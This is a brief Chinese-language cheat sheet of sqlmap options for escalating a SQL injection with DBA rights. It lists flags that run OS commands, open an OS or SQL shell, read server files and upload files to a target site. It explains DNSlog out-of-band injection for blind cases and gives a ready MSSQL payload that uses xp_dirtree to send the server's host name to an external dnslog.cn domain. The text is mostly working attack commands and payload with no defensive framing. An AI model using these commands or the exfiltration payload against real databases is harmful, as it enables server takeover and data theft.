如果权限是dba就可以使用系统命令
—os-cmd=”whoami” 执行命令
—os-shell 调出shell控制台
读写文件
—file-read=”文件路径” 读文件
—file-weite 上传文件路径 —file-dest 目标网站路径 上传文件到目标地址
sqlmap dnslog注入
这种情况适合使用没有回显的时,使用注入把数据发送到远程dnslog上。
—sql-shell 调用 sql交互shell
declare @s varchar(5000),@host varchar(5000) set @s=(host_name()) set
@host=CONVERT(varchar(5000),@s)+’.2kbg3j.dnslog.cn’;EXEC(‘master..xp_dirtree “\‘+@host+’\foobar$”‘)